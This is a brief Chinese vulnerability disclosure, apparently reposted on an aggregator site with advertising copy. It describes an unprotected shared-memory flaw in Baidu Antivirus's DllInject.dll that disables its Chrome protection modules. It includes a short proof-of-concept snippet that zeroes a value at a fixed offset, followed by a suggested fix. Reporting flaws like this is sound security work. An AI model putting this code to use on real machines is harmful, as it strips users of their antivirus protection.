百度杀毒共享内存漏洞导致上网防护失效
百度杀毒是百度公司全新出品的专业杀毒软件,集合了百度强大的云端计算、海量数据学习能力与百度自主研发的反病毒引擎专业能力,一改杀毒软件卡机臃肿的形象,竭力为用户提供轻巧不卡机的产品体验。
DllInject.dll使用共享内存数据,且无权限检查,任意进程均可对其进行修改,造成百度杀毒对浏览器的防御失效。
以chrome浏览器为例:
攻击前:
攻击后:
可以看到,攻击后,chrome不再加载百度杀毒WebSafe、WebMonHook等几个功能DLL
LPCTSTR lpszDll = _T("C:\\Program Files\\Baidu\\BaiduSd\\2.1.0.3086\\websafe\\DllInject.dll");HMODULE hMod = LoadLibrary(lpszDll);DWORD* shareAddr = (DWORD*)((DWORD)hMod + 0x6000); // 针对2.1.0.3086的DllInject.dll*shareAddr = 0; 修复方案: 使用更为安全的内存共享手段,增加权限控制。 就爱阅读www.92to.com网友整理上传,为您提供最全的知识大全,期待您的分享,转载请注明出处。百度杀毒,搭载百度自研双引擎——雪狼引擎、慧眼引擎,采用百度独有的“深度学习”技术,具有超大规模训练集、高木马检出率、极低误报、体积小等特点。
……